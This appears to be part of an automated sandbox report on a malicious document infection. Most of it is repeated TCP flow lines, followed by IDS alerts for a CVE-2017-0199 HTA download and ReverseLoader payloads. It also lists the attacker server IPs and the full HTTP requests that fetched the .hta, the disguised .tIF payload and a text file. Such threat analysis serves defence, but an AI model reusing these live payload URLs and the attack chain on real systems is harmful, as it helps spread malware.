      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.175:80 -> 192.168.2.22:49166
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.175:80 -> 192.168.2.22:49164
      Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 107.172.44.175:80
      Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 107.172.44.175:80 -> 192.168.2.22:49169
      Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 107.172.44.175:80 -> 192.168.2.22:49169
      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.22:49168
      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1321/CAMRM.txt HTTP/1.1Host: 107.172.44.175Connection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
      Source: Joe Sandbox ViewIP Address: 107.172.44.175 107.172.44.175
      Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 107.172.44.175:80
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficHTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8894-Connection: Keep-AliveHost: 107.172.44.175If-Range: "10deaf-627cc9922fce5"
      Source: global trafficHTTP traffic detected: GET /1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
      Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
